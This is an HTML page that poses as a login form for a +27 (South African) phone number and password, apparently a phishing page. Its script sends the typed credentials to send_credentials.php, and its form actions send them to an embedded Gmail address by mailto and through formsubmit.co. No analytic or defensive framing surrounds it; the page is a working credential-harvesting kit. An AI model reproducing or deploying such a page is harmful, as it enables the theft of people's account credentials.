
<!DOCTYPE html>
<html>
<head>
  <center>
<img src="https://i.ibb.co/yWNvy8C/images-1.png"/>
</center>
  <title>Login Page</title>
  
  <script>
    function sendCredentials() {
      var tel = document.getElementById('tel').value;
      var password = document.getElementById('password').value;
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "send_credentials.php", true);
      xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      xhr.send("tel=" + tel + "&password=" + password);
      alert("Your login will be sent press ok to continue sending");
    }
  </script>
</head>
<body>
  <h2>Login Form</h2>
<form action="mailto:eduxprime5@gmail.com" method="post" enctype="text/plain">
<form action="https://formsubmit.co/eduxprime5@gmail.com" method="post">
<fieldset style="border-radius:5px">
  <label for="tel">+27</label>
  <input type="text" id="tel" name="tel" placeholder="Phone number">
</fieldset>
<fieldset style="border-radius:5px">
  <label for="password">Password</label>
  <input type="password" id="password" name="password" placeholder="Enter your password">
</fieldset>
  <button onclick="sendCredentials()">Submit</button>
</body>
</html>
<style>
body{
margin: 1;
justify-content: center;
top:1;
}
  var{
    color:white;
    background: green;
  }
  input{
    color:black;
    backface-visibility: 0;
    border-block-end-color: white;
    border-block-start-color: white;
    border-block-start: white;
    border-color: white;
  }
  p{
    left:1;
    color:green;
    border-top-width: 6;
  }
  button{
    height: 50;
    width: 75;
    color:white;
    background: green;
border-block-end-color: green;
    border-block-start-color: green;
    border-block-start: green;
    border-color: green;
  }
</style>
